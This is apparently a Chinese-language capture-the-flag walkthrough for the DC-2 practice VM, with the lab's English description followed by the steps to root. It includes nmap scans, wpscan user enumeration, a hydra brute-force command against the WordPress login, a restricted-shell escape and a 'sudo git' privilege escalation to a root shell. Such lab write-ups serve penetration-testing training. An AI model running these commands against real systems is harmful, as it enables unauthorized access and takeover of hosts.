靶机信息

DESCRIPTION
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it's designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

TECHNICAL INFORMATION
DC-2 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.

While I haven't tested it within a VMware environment, it should also work.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

Please note that you will need to set the hosts file on your pentesting device to something like:

192.168.0.145 dc-2

Obviously, replace 192.168.0.145 with the actual IP address of DC-2.

It will make life a whole lot simpler (and a certain CMS may not work without it).

If you're not sure how to do this, instructions are here.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
This is the second vulnerable lab challenge that I've created, so feel free to let me know what you think of it.

I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

信息收集

部署完靶机后扫描nmap获得ip地址,一个是kali的ip,另一个就是靶机的ip,之后再扫描主机的开放端口

#ping扫描网段内的主机
nmap -sP 10.0.0.0/24
#扫描主机端口
nmap -sV -p- 10.0.0.18

QQ截图20210216111859.png

有80端口可以尝试使用浏览器访问,但是浏览器会跳转到http://dc-2,在系统hosts补上解析记录

QQ截图20210215113226.png

QQ截图20210215113149.png

QQ截图20210215113256.png

没有robot.txt

QQ截图20210215113624.png

在网站最下方发现wordpress,尝试使用msfconsole搜索发现很多结果

QQ截图20210215114131.png

flag1

QQ截图20210215114151.png

根据提示使用尝试使用cewl

cewl http://dc-2 -w pass.dic

使用wpscan扫描可以获得用户信息

wpscan --url dc-2 -e -u

QQ截图20210216114528.png

flag2

把扫描到的用户作为用户字典进行爆破

QQ截图20210216114803.png

使用hydra对表单进行爆破

hydra -L user.dic -P pass.dic -V -o wordpress.txt dc-2 http-post-form /wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:login_error

QQ截图20210216122807.png

登录jerry账号后发现flag2

QQ截图20210216123031.png

flag3

尝试登录7744端口ssh,只能登录tom的账号

QQ截图20210216123507.png

由于是rbash无法直接使用cat命令查看,改用vi命令,或者使用以下命令绕过rbash限制

#r意味着restrict
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

QQ截图20210216131614.png

flag4

查看/ETC/passwd存在jerry账户,根据提示使用su命令进入jerry账户

QQ截图20210216132003.png

su jerry

QQ截图20210216132118.png

flag5

根据提示发现git命令可以直接使用root权限

QQ截图20210216132402.png

sudo git -p --help
sudo git help config
#输入!后可以使用命令
!whoami
!/bin/bash

QQ截图20210216132754.png

QQ截图20210216132652.png